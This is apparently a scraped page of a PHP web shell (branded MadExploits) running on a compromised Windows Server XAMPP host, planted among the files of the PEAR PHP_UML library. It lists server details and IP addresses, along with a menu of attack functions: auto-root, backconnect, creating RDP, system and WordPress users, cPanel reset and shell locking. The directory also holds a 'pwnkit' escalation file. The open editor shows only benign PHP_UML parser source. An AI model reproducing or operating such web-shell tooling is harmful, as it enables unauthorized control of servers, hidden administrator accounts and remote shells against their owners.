Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHP /
UML /
Input /
PHP /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
FileScanner.php
1.96
KB
-rw-rw-rw-
Parser.php
1.9
KB
-rw-rw-rw-
ParserImpl.php
42.3
KB
-rw-rw-rw-
ParserOptions.php
924
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Parser.php
<?php /** * PHP_UML * * PHP version 5 * * @category PHP * @package PHP_UML * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 * @version SVN: $Revision: 175 $ * @link http://pear.php.net/package/PHP_UML * @since $Date: 2011-09-15 17:07:58 +0200 (jeu., 15 sept. 2011) $ */ /** * The PHP parser. * It stores all the program elements of a PHP file in * a PHP_UML_Metamodel_Superstructure object. * * @category PHP * @package PHP_UML * @subpackage Input * @subpackage PHP * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 */ abstract class PHP_UML_Input_PHP_Parser { const T_NS_SEPARATOR = '\\'; const T_NS_SEPARATOR2 = '::'; // for backward compat /** * Constructor * * @param PHP_UML_Metamodel_Superstructure &$struct An empty instance of metamodel (superstructure) * @param bool $docblocks Set to true to interpret docblocks (@package, types) * @param bool $dollar Set to true to keep the symbol $ in variable names * @param bool $internal Set to true to skip elements tagged with @internal * @param bool $onlyApi Set to true to include only the elements tagged with @api * @param bool $pureObj Set to true to discard procedural code */ abstract public function __construct(PHP_UML_Metamodel_Superstructure &$struct, $docblocks = true, $dollar = true, $internal = true, $onlyApi = false, $pureObj = false); /** * Parse a PHP file * * @param string $fileBase Full path, or base directory * @param string $filePath Pathfile (relative to $fileBase) */ abstract public function parse($fileBase, $filePath); } ?>
Close